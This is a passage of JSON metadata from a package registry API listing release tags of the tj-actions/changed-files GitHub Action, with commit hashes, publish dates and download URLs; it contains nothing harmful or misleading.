changed-files/tags/v13.1/manifests"},{"name":"v13","sha":"f276697f3b86a1d897052524507c59f5e173ccd1","kind":"commit","published_at":"2022-02-17T03:18:40.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v13","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v13","dependencies_parsed_at":"2023-07-20T14:17:35.034Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v13/manifests"},{"name":"v12.2","sha":"00f80efd45353091691a96565de08f4f50c685f8","kind":"commit","published_at":"2021-12-30T02:22:46.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v12.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v12.2","dependencies_parsed_at":"2023-07-20T14:17:32.835Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v12.2/manifests"},{"name":"v2.0.1","sha":"00f80efd45353091691a96565de08f4f50c685f8","kind":"commit","published_at":"2021-12-30T02:22:46.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v2.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v2.0.1","dependencies_parsed_at":"2023-07-20T14:17:31.998Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v2.0.1/manifests"},{"name":"v12.1","sha":"f56e736bedd192c12951db94e83a440885d04eb1","kind":"commit","published_at":"2021-12-30T00:57:35.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v12.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v12.1","dependencies_parsed_at":"2023-07-20T14:17:30.196Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v12.1/manifests"},{"name":"v2.0.0","sha":"9c1a181e67797cd053d15062eda07b2b322bbbfe","kind":"commit","published_at":"2021-12-17T20:01:08.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v2.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v2.0.0","dependencies_parsed_at":"2023-07-20T14:17:30.652Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v2.0.0/manifests"},{"name":"v12","sha":"019a09d36e5b592a6770a9a71ef1b3efd9a85d37","kind":"commit","published_at":"2021-12-14T07:06:26.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v12","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v12","dependencies_parsed_at":"2023-07-20T14:17:30.482Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v12/manifests"},{"name":"v11.9","sha":"3b638a970886ec84db14ad956bb4df9766bd7c50","kind":"commit","published_at":"2021-12-04T21:39:14.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v11.9","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v11.9","dependencies_parsed_at":"2023-07-20T14:17:31.618Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v11.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.9/manifests"},{"name":"v11","sha":"3b638a970886ec84db14ad956bb4df9766bd7c50","kind":"commit","published_at":"2021-12-04T21:39:14.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v11","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11/manifests"},{"name":"v1.3.1","sha":"188487d180e816622215bd011cbaca666af41ed9","kind":"commit","published_at":"2021-12-04T21:34:44.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v1.3.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v1.3.1","dependencies_parsed_at":"2023-07-20T14:17:33.527Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.3.1/manifests"},{"name":"v11.8","sha":"b42f932be5b3fee4a990cb3e03478d5da2d4293b","kind":"commit","published_at":"2021-12-04T12:58:46.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v11.8","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v11.8","dependencies_parsed_at":"2023-07-20T14:17:34.652Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v11.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.8/manifests"},{"name":"v1.3.0","sha":"30988915fa46789ba51cc1436c92488a52ac44ee","kind":"commit","published_at":"2021-12-04T12:50:37.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v1.3.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v1.3.0","dependencies_parsed_at":"2023-07-20T14:17:34.148Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.3.0/manifests"},{"name":"v11.7","sha":"8dfe0ee3f4840f84a7947b5288b19d7a583755ae","kind":"commit","published_at":"2021-11-19T21:36:07.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v11.7","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v11.7","dependencies_parsed_at":"2023-07-20T14:17:20.348Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v11.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.7/manifests"},{"name":"v1.2.2","sha":"467d26c8b77612d9f7d20df5271edc207eae69a7","kind":"commit","published_at":"2021-11-19T21:27:56.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v1.2.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v1.2.2","dependencies_parsed_at":"2023-07-20T14:17:31.652Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.2.2/manifests"},{"name":"v11.6","sha":"aae164d51be780a235cdeea89752bbacbbfee3c3","kind":"commit","published_at":"2021-11-08T13:35:22.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v11.6","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v11.6","dependencies_parsed_at":"2023-07-20T14:17:33.839Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v11.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.6/manifests"},{"name":"v1.2.1","sha":"d9eb683b30e5b231c948331ad364b991fa8be544","kind":"commit","published_at":"2021-11-08T13:17:51.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v1.2.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v1.2.1","dependencies_parsed_at":"2023-07-20T14:17:31.399Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"09a879748c548705ec26508c030b11aad9b5097a","kind":"commit","published_at":"2021-10-30T20:15:42.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v1.2.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v1.2.0","dependencies_parsed_at":"2023-07-20T14:17:20.400Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.2.0/manifests"},{"name":"v11.5","sha":"09a879748c548705ec26508c030b11aad9b5097a","kind":"commit","published_at":"2021-10-30T20:15:42.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v11.5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v11.5","dependencies_parsed_at":"2023-07-20T14:17:32.122Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.5/manifests"},{"name":"v11.4","sha":"b54a7ae7259d0729d0b582bac28b05462f16cd64","kind":"commit","published_at":"2021-10-30T19:58:02.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v11.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v11.4","dependencies_parsed_at":"2023-07-20T14:17:33.678Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.4/manifests"},{"name":"v11.3","sha":"902e60737927ccef3713faad3752d84f1153d7ac","kind":"commit","published_at":"2021-10-27T11:30:47.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v11.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v11.3","dependencies_parsed_at":"2023-07-20T14:17:38.906Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.3/manifests"},{"name":"v11.2","sha":"2b51570d5f086eb07a1e527a182773b2045ec26b","kind":"commit","published_at":"2021-10-26T14:16:42.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v11.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v11.2","dependencies_parsed_at":"2023-07-20T14:17:21.598Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.2/manifests"},{"name":"v11.1","sha":"040111b36775c1033b4703b77f9c5c203da18936","kind":"commit","published_at":"2021-10-25T20:02:53.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v11.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v11.1","dependencies_parsed_at":"2023-07-20T14:17:32.559Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v11.1/manifests"},{"name":"v10.1","sha":"1d34e69895b85e643b9b259d54f395f0d1e27c10","kind":"commit","published_at":"2021-10-12T11:59:10.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v10.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v10.1","dependencies_parsed_at":"2023-07-20T14:17:32.648Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v10.1/manifests"},{"name":"v10","sha":"b86b537e2b78397b630cfb1a8d0aec1e03379737","kind":"commit","published_at":"2021-10-03T13:09:58.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v10","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v10","dependencies_parsed_at":"2023-07-20T14:17:35.089Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v10/manifests"},{"name":"v1.1.3","sha":"8e7cc77ab9c1bffc233f2f3023d1b89ed44c9af5","kind":"commit","published_at":"2021-09-26T06:32:59.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v1.1.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v1.1.3","dependencies_parsed_at":"2023-07-20T14:17:21.298Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"81ad4b874479c31a00285815995079e20c6c2779","kind":"commit","published_at":"2021-09-05T18:21:28.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v1.1.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v1.1.2","dependencies_parsed_at":"2023-07-20T14:17:32.546Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"5e2a2f192377df7d67537b0e788e1b53e8a76f12","kind":"commit","published_at":"2021-09-05T12:22:47.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v1.1.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v1.1.1","dependencies_parsed_at":"2023-07-20T14:17:34.588Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"1af9ab38306a2fa478c9772eabab167444dbc755","kind":"commit","published_at":"2021-09-04T13:08:20.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v1.1.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v1.1.0","dependencies_parsed_at":"2023-07-20T14:17:30.376Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.1.0/manifests"},{"name":"v1.0.3","sha":"55a857d66a8e01f50a2a37d18239edde79b1668d","kind":"commit","published_at":"2021-09-03T07:38:10.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v1.0.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v1.0.3","dependencies_parsed_at":"2023-07-20T14:17:30.098Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"62a9200adfe8200623dcd28ca74973e82baa954c","kind":"commit","published_at":"2021-08-28T02:59:23.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v1.0.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v1.0.2","dependencies_parsed_at":"2023-07-20T14:17:20.927Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v1.0.2/manifests"},{"name":"v9.3","sha":"2a771ad30d623c27165b3677688ebe3f17c49f65","kind":"commit","published_at":"2021-08-09T12:57:25.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v9.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v9.3","dependencies_parsed_at":"2023-07-20T14:17:30.550Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v9.3/manifests"},{"name":"v9.2","sha":"75933dc40b241db3752ed4c9e2f24cb7cfff51f9","kind":"commit","published_at":"2021-08-06T10:14:50.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v9.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v9.2","dependencies_parsed_at":"2023-07-20T14:17:33.256Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v9.2/manifests"},{"name":"v9.1","sha":"2c0d12b627191145ce31c2a098d8d37e93b35861","kind":"commit","published_at":"2021-07-30T16:14:01.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v9.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v9.1","dependencies_parsed_at":"2023-07-20T14:17:30.542Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v9.1/manifests"},{"name":"v9","sha":"7abdbc94e90b9a9b002ad86d8d2a5f9472c3c75c","kind":"commit","published_at":"2021-07-24T12:53:47.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v9","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v9","dependencies_parsed_at":"2023-07-20T14:17:30.772Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v9/manifests"},{"name":"v8.9","sha":"675ab58887b9ae58d77d4dcd2d5e58228ab5f185","kind":"commit","published_at":"2021-07-18T01:33:35.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v8.9","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v8.9","dependencies_parsed_at":"2023-07-20T14:17:31.583Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.9/manifests"},{"name":"v8.8","sha":"8c6f276ea5961fa51474aaa203c6d06226acbaa8","kind":"commit","published_at":"2021-07-17T19:13:26.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v8.8","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v8.8","dependencies_parsed_at":"2023-07-20T14:17:31.309Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.8/manifests"},{"name":"v8.7","sha":"d825b1f7094e756ca34581aaab611003eaa23975","kind":"commit","published_at":"2021-07-17T15:54:59.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v8.7","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v8.7","dependencies_parsed_at":"2023-07-20T14:17:21.310Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.7/manifests"},{"name":"v8.6","sha":"0bd70b7aecded5f2eb1f0498c3692433f2453b37","kind":"commit","published_at":"2021-07-17T14:55:22.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v8.6","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v8.6","dependencies_parsed_at":"2023-07-20T14:17:32.617Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.6/manifests"},{"name":"v8.5","sha":"0fe67a1f15b48dcd40e7ea0dfdd4afc9418febf0","kind":"commit","published_at":"2021-07-14T21:01:31.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v8.5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v8.5","dependencies_parsed_at":"2023-07-20T14:17:30.357Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.5/manifests"},{"name":"v8.4","sha":"7bfa539f0d6ed4331d2899e7440a1946929829c1","kind":"commit","published_at":"2021-06-26T16:12:28.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v8.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v8.4","dependencies_parsed_at":"2023-07-20T14:17:32.632Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.4/manifests"},{"name":"v8.3","sha":"d679de9200b28e963362cba99095dd8d9f23d446","kind":"commit","published_at":"2021-06-25T18:58:59.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v8.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v8.3","dependencies_parsed_at":"2023-07-20T14:17:29.750Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.3/manifests"},{"name":"v8.2","sha":"1e10ed49507767257514a643ca1baab24a5496af","kind":"commit","published_at":"2021-06-24T20:46:31.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v8.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v8.2","dependencies_parsed_at":"2023-07-20T14:17:32.558Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.2/manifests"},{"name":"v8.1","sha":"0754fdabe31b721683e1ffc719584df67ad24c87","kind":"commit","published_at":"2021-06-18T23:28:02.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v8.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v8.1","dependencies_parsed_at":"2023-07-20T14:17:20.360Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8.1/manifests"},{"name":"v8","sha":"d290bdd91e68dcf1bafe3fa63280666077cbc61c","kind":"commit","published_at":"2021-06-18T23:15:18.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v8","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v8","dependencies_parsed_at":"2023-07-20T14:17:35.080Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v8/manifests"},{"name":"v7","sha":"15b1769fc52da64fe168a41ccb01c48b27687149","kind":"commit","published_at":"2021-06-09T22:11:27.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v7","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v7","dependencies_parsed_at":"2023-07-20T14:17:30.306Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v7/manifests"},{"name":"v6.3","sha":"2ecd06deb6721d96fd1da0369fc6be39e974edba","kind":"commit","published_at":"2021-05-26T22:01:44.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v6.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v6.3","dependencies_parsed_at":"2023-07-20T14:17:30.839Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v6.3","man